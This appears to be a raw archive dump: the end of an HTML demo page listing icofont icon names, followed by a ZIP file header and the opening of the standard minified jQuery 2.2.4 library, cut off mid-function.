				<span> reply-all </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-reply"></i>
				</div> 
				<span> reply </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-resize"></i>
				</div> 
				<span> resize </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-responsive"></i>
				</div> 
				<span> responsive </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-retweet"></i>
				</div> 
				<span> retweet </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-road"></i>
				</div> 
				<span> road </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-robot"></i>
				</div> 
				<span> robot </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-royal"></i>
				</div> 
				<span> royal </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rss-feed"></i>
				</div> 
				<span> rss-feed </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-safety"></i>
				</div> 
				<span> safety </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sale-discount"></i>
				</div> 
				<span> sale-discount </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-satellite"></i>
				</div> 
				<span> satellite </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-send-mail"></i>
				</div> 
				<span> send-mail </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-server"></i>
				</div> 
				<span> server </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-settings-alt"></i>
				</div> 
				<span> settings-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-settings"></i>
				</div> 
				<span> settings </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-share-alt"></i>
				</div> 
				<span> share-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-share-boxed"></i>
				</div> 
				<span> share-boxed </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-share"></i>
				</div> 
				<span> share </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-shield"></i>
				</div> 
				<span> shield </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-shopping-cart"></i>
				</div> 
				<span> shopping-cart </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sign-in"></i>
				</div> 
				<span> sign-in </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sign-out"></i>
				</div> 
				<span> sign-out </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-signal"></i>
				</div> 
				<span> signal </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-site-map"></i>
				</div> 
				<span> site-map </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-smart-phone"></i>
				</div> 
				<span> smart-phone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-soccer"></i>
				</div> 
				<span> soccer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sort-alt"></i>
				</div> 
				<span> sort-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sort"></i>
				</div> 
				<span> sort </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-space"></i>
				</div> 
				<span> space </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-spanner"></i>
				</div> 
				<span> spanner </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-speech-comments"></i>
				</div> 
				<span> speech-comments </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-speed-meter"></i>
				</div> 
				<span> speed-meter </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-spinner-alt-1"></i>
				</div> 
				<span> spinner-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-spinner-alt-2"></i>
				</div> 
				<span> spinner-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-spinner-alt-3"></i>
				</div> 
				<span> spinner-alt-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-spinner-alt-4"></i>
				</div> 
				<span> spinner-alt-4 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-spinner-alt-5"></i>
				</div> 
				<span> spinner-alt-5 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-spinner-alt-6"></i>
				</div> 
				<span> spinner-alt-6 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-spinner"></i>
				</div> 
				<span> spinner </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-spreadsheet"></i>
				</div> 
				<span> spreadsheet </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-square"></i>
				</div> 
				<span> square </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ssl-security"></i>
				</div> 
				<span> ssl-security </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-star-alt-1"></i>
				</div> 
				<span> star-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-star-alt-2"></i>
				</div> 
				<span> star-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-star"></i>
				</div> 
				<span> star </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-street-view"></i>
				</div> 
				<span> street-view </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-support-faq"></i>
				</div> 
				<span> support-faq </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tack-pin"></i>
				</div> 
				<span> tack-pin </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tag"></i>
				</div> 
				<span> tag </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tags"></i>
				</div> 
				<span> tags </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tasks-alt"></i>
				</div> 
				<span> tasks-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tasks"></i>
				</div> 
				<span> tasks </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-telephone"></i>
				</div> 
				<span> telephone </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-telescope"></i>
				</div> 
				<span> telescope </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-terminal"></i>
				</div> 
				<span> terminal </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-thumbs-down"></i>
				</div> 
				<span> thumbs-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-thumbs-up"></i>
				</div> 
				<span> thumbs-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tick-boxed"></i>
				</div> 
				<span> tick-boxed </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tick-mark"></i>
				</div> 
				<span> tick-mark </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ticket"></i>
				</div> 
				<span> ticket </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tie"></i>
				</div> 
				<span> tie </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-toggle-off"></i>
				</div> 
				<span> toggle-off </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-toggle-on"></i>
				</div> 
				<span> toggle-on </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tools-alt-2"></i>
				</div> 
				<span> tools-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tools"></i>
				</div> 
				<span> tools </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-touch"></i>
				</div> 
				<span> touch </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-traffic-light"></i>
				</div> 
				<span> traffic-light </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-transparent"></i>
				</div> 
				<span> transparent </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tree"></i>
				</div> 
				<span> tree </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-unique-idea"></i>
				</div> 
				<span> unique-idea </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-unlock"></i>
				</div> 
				<span> unlock </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-unlocked"></i>
				</div> 
				<span> unlocked </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-upload-alt"></i>
				</div> 
				<span> upload-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-upload"></i>
				</div> 
				<span> upload </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-usb-drive"></i>
				</div> 
				<span> usb-drive </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-usb"></i>
				</div> 
				<span> usb </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-vector-path"></i>
				</div> 
				<span> vector-path </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-verification-check"></i>
				</div> 
				<span> verification-check </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wall-clock"></i>
				</div> 
				<span> wall-clock </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wall"></i>
				</div> 
				<span> wall </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wallet"></i>
				</div> 
				<span> wallet </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-warning-alt"></i>
				</div> 
				<span> warning-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-warning"></i>
				</div> 
				<span> warning </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-water-drop"></i>
				</div> 
				<span> water-drop </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-web"></i>
				</div> 
				<span> web </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wheelchair"></i>
				</div> 
				<span> wheelchair </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wifi-alt"></i>
				</div> 
				<span> wifi-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wifi"></i>
				</div> 
				<span> wifi </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-world"></i>
				</div> 
				<span> world </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-zigzag"></i>
				</div> 
				<span> zigzag </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-zipped"></i>
				</div> 
				<span> zipped </span>
			</div>
		</li>
		
		</ul>
	</div>	
	</body>
	</html>
	PK!G��JNJNjquery/jquery.min.jsnu&1i�/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */
!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(e.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor()},push:g,sort:c.sort,splice:c.splice},n.extend=n.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||n.isFunction(g)||(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(n.isPlainObject(d)||(e=n.isArray(d)))?(e?(e=!1,f=c&&n.isArray(c)?c:[]):f=c&&n.isPlainObject(c)?c:{},g[b]=n.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},n.extend({expando:"jQuery"+(m+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===n.type(a)},isArray:Array.isArray,isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){var b=a&&a.toString();return!n.isArray(a)&&b-parseFloat(b)+1>=0},isPlainObject:function(a){var b;if("object"!==n.type(a)||a.nodeType||n.isWindow(a))return!1;if(a.constructor&&!k.call(a,"constructor")&&!k.call(a.constructor.prototype||{},"isPrototypeOf"))return!1;for(b in a);return void 0===b||k.call(a,b)},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?i[j.call(a)]||"object":typeof a},globalEval:function(a){var b,c=eval;a=n.trim(a),a&&(1===a.indexOf("use strict")?(b=d.createElement("script"),b.text=a,d.head.appendChild(b).parentNode.removeChild(b)):c(a))},camelCase:function(a){return a.replace(p,"ms-").replace(q,r)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(s(a)){for(c=a.length;c>d;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(o,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(s(Object(a))?n.merge(c,"string"==typeof a?[a]:a):g.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:h.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;c>d;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,e,g=0,h=[];if(s(a))for(d=a.length;d>g;g++)e=b(a[g],g,c),null!=e&&h.push(e);else for(g in a)e=b(a[g],g,c),null!=e&&h.push(e);return f.apply([],h)},guid:1,proxy:function(a,b){var c,d,f;return"string"==typeof b&&(c=a[b],b=a,a=c),n.isFunction(a)?(d=e.call(arguments,2),f=function(){return a.apply(b||this,d.concat(e.call(arguments)))},f.guid=a.guid=a.guid||n.guid++,f):void 0},now:Date.now,support:l}),"function"==typeof Symbol&&(n.fn[Symbol.iterator]=c[Symbol.iterator]),n.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){i["[object "+b+"]"]=b.toLowerCase()});function s(a){var b=!!a&&"length"in a&&a.length,c=n.type(a);return"function"===c||n.isWindow(a)?!1:"array"===c||0===b||"number"==typeof b&&b>0&&b-1 in a}var t=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ga(),z=ga(),A=ga(),B=function(a,b){return a===b&&(l=!0),0},C=1<<31,D={}.hasOwnProperty,E=[],F=E.pop,G=E.push,H=E.push,I=E.slice,J=function(a,b){for(var c=0,d=a.length;d>c;c++)if(a[c]===b)return c;return-1},K="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",L="[\\x20\\t\\r\\n\\f]",M="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",N="\\["+L+"*("+M+")(?:"+L+"*([*^$|!~]?=)"+L+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+M+"))|)"+L+"*\\]",O=":("+M+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+N+")*)|.*)\\)|)",P=new RegExp(L+"+","g"),Q=new RegExp("^"+L+"+|((?:^|[^\\\\])(?:\\\\.)*)"+L+"+$","g"),R=new RegExp("^"+L+"*,"+L+"*"),S=new RegExp("^"+L+"*([>+~]|"+L+")"+L+"*"),T=new RegExp("="+L+"*([^\\]'\"]*?)"+L+"*\\]","g"),U=new RegExp(O),V=new RegExp("^"+M+"$"),W={ID:new RegExp("^#("+M+")"),CLASS:new RegExp("^\\.("+M+")"),TAG:new RegExp("^("+M+"|[*])"),ATTR:new RegExp("^"+N),PSEUDO:new RegExp("^"+O),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+L+"*(even|odd|(([+-]|)(\\d*)n|)"+L+"*(?:([+-]|)"+L+"*(\\d+)|))"+L+"*\\)|)","i"),bool:new RegExp("^(?:"+K+")$","i"),needsContext:new RegExp("^"+L+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+L+"*((?:-\\d)?\\d*)"+L+"*\\)|)(?=[^-]|$)","i")},X=/^(?:input|select|textarea|button)$/i,Y=/^h\d$/i,Z=/^[^{]+\{\s*\[native \w/,$=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,_=/[+~]/,aa=/'|\\/g,ba=new RegExp("\\\\([\\da-f]{1,6}"+L+"?|("+L+")|.)","ig"),ca=function(a,b,c){var d="0x"+b-65536;return d!==d||c?b:0>d?String.fromCharCode(d+65536):String.fromCharCode(d>>10|55296,1023&d|56320)},da=function(){m()};try{H.apply(E=I.call(v.childNodes),v.childNodes),E[v.childNodes.length].nodeType}catch(ea){H={apply:E.length?function(a,b){G.apply(a,I.call(b))}:function(a,b){var c=a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function fa(a,b,d,e){var f,h,j,k,l,o,r,s,w=b&&b.ownerDocument,x=b?b.nodeType:9;if(d=d||[],"string"!=typeof a||!a||1!==x&&9!==x&&11!==x)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==x&&(o=$.exec(a)))if(f=o[1]){if(9===x){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(w&&(j=w.getElementById(f))&&t(b,j)&&j.id===f)return d.push(j),d}else{if(o[2])return H.apply(d,b.getElementsByTagName(a)),d;if((f=o[3])&&c.getElementsByClassName&&b.getElementsByClassName)return H.apply(d,b.getElementsByClassName(f)),d}if(c.qsa&&!A[a+" "]&&(!q||!q.test(a))){if(1!==x)w=b,s=a;else if("object"!==b.nodeName.toLowerCase()){(k=b.getAttribute("id"))?k=k.replace(aa,"\\$&"):b.setAttribute("id",k=u),r=g(a),h=r.length,l=V.test(k)?"#"+k:"[id='"+k+"']";while(h--)r[h]=l+" "+qa(r[h]);s=r.join(","),w=_.test(a)&&oa(b.parentNode)||b}if(s)try{return H.apply(d,w.querySelectorAll(s)),d}catch(y){}finally{k===u&&b.removeAttribute("id")}}}return i(a.replace(Q,"$1"),b,d,e)}function ga(){var a=[];function b(c,e){return a.push(c+" ")>d.cacheLength&&delete b[a.shift()],b[c+" "]=e}return b}function ha(a){return a[u]=!0,a}function ia(a){var b=n.createElement("div");try{return!!a(b)}catch(c){return!1}finally{b.parentNode&&b.parentNode.removeChild(b),b=null}}function ja(a,b){var c=a.split("|"),e=c.length;while(e--)d.attrHandle[c[e]]=b}function ka(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||C)-(~a.sourceIndex||C);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function la(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function ma(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function na(a){return ha(function(b){return b=+b,ha(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e]=c[e]))})})}function oa(a){return a&&"undefined"!=typeof a.getElementsByTagName&&a}c=fa.support={},f=fa.isXML=function(a){var b=a&&(a.ownerDocument||a).documentElement;return b?"HTML"!==b.nodeName:!1},m=fa.setDocument=function(a){var b,e,g=a?a.ownerDocument||a:v;return g!==n&&9===g.nodeType&&g.documentElement?(n=g,o=n.documentElement,p=!f(n),(e=n.defaultView)&&e.top!==e&&(e.addEventListener?e.addEventListener("unload",da,!1):e.attachEvent&&e.attachEvent("onunload",da)),c.attributes=ia(function(a){return a.className="i",!a.getAttribute("className")}),c.getElementsByTagName=ia(function(a){return a.appendChild(n.createComment("")),!a.getElementsByTagName("*").length}),c.getElementsByClassName=Z.test(n.getElementsByClassName),c.getById=ia(function(a){return o.appendChild(a).id=u,!n.getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a);return c?[c]:[]}},d.filter.ID=function(a){var b=a.replace(ba,ca);return function(a){return a.getAttribute("id")===b}}):(delete d.find.ID,d.filter.ID=function(a){var b=a.replace(ba,ca);return function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}}),d.find.TAG=c.getElementsByTagName?function(a,b){return"undefined"!=typeof b.getElementsByTagName?b.getElementsByTagName(a):c.qsa?b.querySelectorAll(a):void 0}:function(a,b){var c,d=[],e=0,f=b.getElementsByTagName(a);if("*"===a){while(c=f[e++])1===c.nodeType&&d.push(c);return d}return f},d.find.CLASS=c.getElementsByClassName&&function(a,b){return"undefined"!=typeof b.getElementsByClassName&&p?b.getElementsByClassName(a):void 0},r=[],q=[],(c.qsa=Z.test(n.querySelectorAll))&&(ia(function(a){o.appendChild(a).innerHTML="<a id='"+u+"'></a><select id='"+u+"-\r\\' msallowcapture=''><option selected=''></option></select>",a.querySelectorAll("[msallowcapture^='']").length&&q.push("[*^$]="+L+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+L+"*(?:value|"+K+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").length||q.push(".#.+[+~]")}),ia(function(a){var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+L+"*[*^$|!~]?="),a.querySelectorAll(":enabled").length||q.push(":enabled",":disabled"),a.querySelectorAll("*,:x"),q.push(",.*:")})),(c.matchesSelector=Z.test(s=o.matches||o.webkitMatchesSelector||o.mozMatchesSelector||o.oMatchesSelector||o.msMatchesSelector))&&ia(function(a){c.disconnectedMatch=s.call(a,"div"),s.call(a,"[s!='']:x"),r.push("!=",O)}),q=q.length&&new RegExp(q.join("|")),r=r.length&&new RegExp(r.join("|")),b=Z.test(o.compareDocumentPosition),t=b||Z.test(o.contains)?function(a,b){var c=9===a.nodeType?a.documentElement:a,d=b&&b.parentNode;return a===d||!(!d||1!==d.nodeType||!(c.contains?c.contains(d):a.compareDocumentPosition&&16&a.compareDocumentPosition(d)))}:function(a,b){if(b)while(b=b.parentNode)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocumentPosition(a)===d?a===n||a.ownerDocument===v&&t(v,a)?-1:b===n||b.ownerDocument===v&&t(v,b)?1:k?J(k,a)-J(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e||!f)return a===n?-1:b===n?1:e?-1:f?1:k?J(k,a)-J(k,b):0;if(e===f)return ka(a,b);c=a;while(c=c.parentNode)g.unshift(c);c=b;while(c=c.parentNode)h.unshift(c);while(g[d]===h[d])d++;return d?ka(g[d],h[d]):g[d]===v?-1:h[d]===v?1:0},n):n},fa.matches=function(a,b){return fa(a,null,null,b)},fa.matchesSelector=function(a,b){if((a.ownerDocument||a)!==n&&m(a),b=b.replace(T,"='$1']"),c.matchesSelector&&p&&!A[b+" "]&&(!r||!r.test(b))&&(!q||!q.test(b)))try{var d=s.call(a,b);if(d||c.disconnectedMatch||a.document&&11!==a.document.nodeType)return d}catch(e){}return fa(b,n,null,[a]).length>0},fa.contains=function(a,b){return(a.ownerDocument||a)!==n&&m(a),t(a,b)},fa.attr=function(a,b){(a.ownerDocument||a)!==n&&m(a);var e=d.attrHandle[b.toLowerCase()],f=e&&D.call(d.attrHandle,b.toLowerCase())?e(a,b,!p):void 0;return void 0!==f?f:c.attributes||!p?a.getAttribute(b):(f=a.getAttributeNode(b))&&f.specified?f.value:null},fa.error=function(a){throw new Error("Syntax error, unrecognized expression: "+a)},fa.uniqueSort=function(a){var b,d=[],e=0,f=0;if(l=!c.detectDuplicates,k=!c.sortStable&&a.slice(0),a.sort(B),l){while(b=a[f++])b===a[f]&&(e=d.push(f));while(e--)a.splice(d[e],1)}return k=null,a},e=fa.getText=function(a){var b,c="",d=0,f=a.nodeType;if(f){if(1===f||9===f||11===f){if("string"==typeof a.textContent)return a.textContent;for(a=a.firstChild;a;a=a.nextSibling)c+=e(a)}else if(3===f||4===f)return a.nodeValue}else while(b=a[d++])c+=e(b);return c},d=fa.selectors={cacheLength:50,createPseudo:ha,match:W,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(a){return a[1]=a[1].replace(ba,ca),a[3]=(a[3]||a[4]||a[5]||"").replace(ba,ca),"~="===a[2]&&(a[3]=" "+a[3]+" "),a.slice(0,4)},CHILD:function(a){return a[1]=a[1].toLowerCase(),"nth"===a[1].slice(0,3)?(a[3]||fa.error(a[0]),a[4]=+(a[4]?a[5]+(a[6]||1):2*("even"===a[3]||"odd"===a[3])),a[5]=+(a[7]+a[8]||"odd"===a[3])):a[3]&&fa.error(a[0]),a},PSEUDO:function(a){var b,c=!a[6]&&a[2];return 